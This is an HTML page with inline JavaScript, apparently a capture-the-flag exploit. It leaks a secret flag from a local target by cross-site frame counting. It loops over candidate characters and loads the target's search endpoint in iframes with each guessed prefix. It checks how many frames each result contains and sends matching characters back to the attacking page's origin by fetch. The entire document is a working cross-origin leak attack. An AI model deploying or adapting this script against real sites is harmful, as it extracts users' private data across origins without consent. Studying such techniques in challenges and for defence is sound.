<!DOCTYPE html>
<body>
    <script>
      const flag = "{{ flag }}";
      const chr_list = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','}'];

      for(let chr=0; chr<chr_list.length; chr++){
        let start = performance.now();
        const iframe = document.createElement("iframe");
        iframe.src = `http://127.0.0.1:8000/iframe?query=${flag + chr_list[chr]}`;

        iframe.onload = () => {
            const frameCount = iframe.contentWindow.length;
            if(frameCount >= 1){
                fetch('/?flag='+chr_list[chr])
            }
        };

        document.body.appendChild(iframe);
      }
    </script>
</body>
